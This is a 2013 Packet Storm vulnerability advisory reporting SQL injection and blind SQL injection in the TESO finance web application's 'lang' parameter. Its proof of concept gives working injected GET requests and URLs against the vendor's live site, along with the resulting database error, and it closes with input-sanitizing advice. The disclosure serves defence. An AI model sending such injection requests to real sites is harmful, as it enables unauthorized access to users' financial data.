TESO Web 2.0 SQL Injection

2013-06-09T00:00:00
ID PACKETSTORM:121941
Type packetstorm
Reporter Juan Carlos Garcia
Modified 2013-06-09T00:00:00

Description

                                        
                                            `============================================  
TESO web 2.0 SQLInjection/ Blind SQLInjection  
  
=============================================  
  
I. VULNERABILITY  
-------------------------  
#Title: TESO SQLInjection/ Blind SQLInjection  
#Vendor:http://www.tesoweb.com  
#Author:Juan Carlos García (@secnight)  
#Follow me   
http://www.highsec.es  
http://hackingmadrid.blogspot.com  
http://blogs.0verl0ad.com  
Twitter:@secnight  
Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn  
  
  
  
II. DESCRIPTION  
-------------------------  
  
TESO is a powerful, free lets you take control of your money and your portfolio, both at home and in your business.  
  
Its main features are:  
  
Privacy and confidentiality. TESO stores no personal information nor are they ask in the registry.  
Police their keys and no one can associate with the accounts stored in TESO.  
  
Bank Reconciliation. TESO to load bank statements to compare (reconcile) with its own accounting.  
  
Investment Securities. TESO updates the latest quotes from more than 1000 European and American  
values​​, evaluate your portfolio and calculates realized and unrealized capital gains. You can  
manage your portfolio TESO without carrying a full accounting of your money  
  
Established that is not safe, it is not private and are in danger of data confidentiality   
  
III. PROOF OF CONCEPT  
-------------------------  
  
##Blind SQLInjection  
  
Affected items  
  
/default.asp   
  
Attack details  
  
URL encoded GET input lang was set to -1' or '3'='3  
GET /default.asp?lang=-1%27%20or%204%20%3d%20%275 HTTP/1.1  
http://www.tesoweb.es/default.asp?lang=-1%27%20or%204%20%3d%20%275  
  
##SQLinjection  
  
Affected items  
  
/default.asp   
  
Attack details  
  
URL encoded GET input lang was set to 1'  
Error message found:   
  
<font face="Arial"   
size=2>Syntax error in string in query expression '((idioma = '1'') and (activa = True))  
order by fecha desc'.</font>  
  
GET /default.asp?lang=1%27 HTTP/1.1  
  
http://www.tesoweb.es/default.asp?lang=1%27  
  
  
IV SOLUTION  
------------------------  
  
The script should filter metacharacters from user input.   
It's absolutely vital to sanitize user inputs to insure   
that they do not contain dangerous codes, whether to the  
SQL server or to HTML itself. One's first idea is to strip  
out "bad stuff", such as quotes or semicolons or escapes,   
but this is a misguided attempt. Though it's easy to point  
out some dangerous characters, it's harder to point to all of them.  
  
  
V. CREDITS  
-------------------------  
  
This vulnerability has been discovered  
by Juan Carlos García(@secnight)  
  
  
VII. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`